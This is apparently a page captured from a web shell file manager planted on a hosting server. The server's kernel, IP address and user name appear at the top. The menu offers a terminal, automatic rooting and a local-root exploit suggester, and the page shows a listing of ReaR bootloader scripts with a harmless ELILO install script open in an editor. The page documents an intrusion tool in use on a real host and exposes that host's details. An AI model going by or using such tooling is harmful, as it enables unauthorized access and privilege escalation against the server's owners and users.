Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.217.87
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
finalize /
Linux-i386 /
Delete
Unzip
Name
Size
Permission
Date
Action
610_EFISTUB_run_efibootmgr.sh
3.79
KB
-rw-r--r--
2026-04-01 09:39
630_install_grub.sh
5.78
KB
-rw-r--r--
2026-04-01 09:39
640_install_lilo.sh
982
B
-rw-r--r--
2026-04-01 09:39
650_install_elilo.sh
1.57
KB
-rw-r--r--
2026-04-01 09:39
660_install_grub2.sh
10.48
KB
-rw-r--r--
2026-04-01 09:39
665_set_grubenv.sh
1.68
KB
-rw-r--r--
2026-04-01 09:39
670_run_efibootmgr.sh
9.52
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
# This script is meant for UEFI based systems using ELILO (SLES) # # skip if another bootloader was installed if [[ -z "$NOBOOTLOADER" ]] ; then return fi # for UEFI systems we defined USING_UEFI_BOOTLOADER=1; BIOS based is 0 or "" is_true $USING_UEFI_BOOTLOADER || return 0 # when set to 0 # Only for elilo [[ "$BOOTLOADER" == "ELILO" ]] || return 0 # only continue when bootloader is elilo based # FIXME: # This tests for elilo in the recovery system but below elilo is called inside chroot in the target system # furthermore why such a complicated test instead of testing with plain "type -p elilo || Error ..." # cf. the better looking code in finalize/Linux-i386/640_install_lilo.sh [[ $(type -p elilo) ]] || Error "Could not find elilo executable" LogPrint "Installing ELILO boot loader" if [[ -r "$LAYOUT_FILE" && -r "$LAYOUT_DEPS" ]]; then # Check if we find the vfat file system /boot/efi where we expect it [[ -d "$TARGET_FS_ROOT/boot/efi" ]] || Error "Could not find directory $TARGET_FS_ROOT/boot/efi" # the UEFI_BOOTLOADER was saved in /etc/rear/rescue.conf file by rear mkrescue/mkbackup [[ -f "$TARGET_FS_ROOT$UEFI_BOOTLOADER" ]] || Error "Could not find elilo.efi $TARGET_FS_ROOT$UEFI_BOOTLOADER" [[ -r "$TARGET_FS_ROOT/etc/elilo.conf" ]] LogIfError "Unable to find /etc/elilo.conf" # Find the disks that need a new ELILO disks=$( grep '^disk \|^multipath ' $LAYOUT_FILE | cut -d' ' -f2 ) [[ "$disks" ]] || Error "Unable to find any disks" chroot $TARGET_FS_ROOT elilo -v >&2 if (( $? == 0 )); then NOBOOTLOADER= fi fi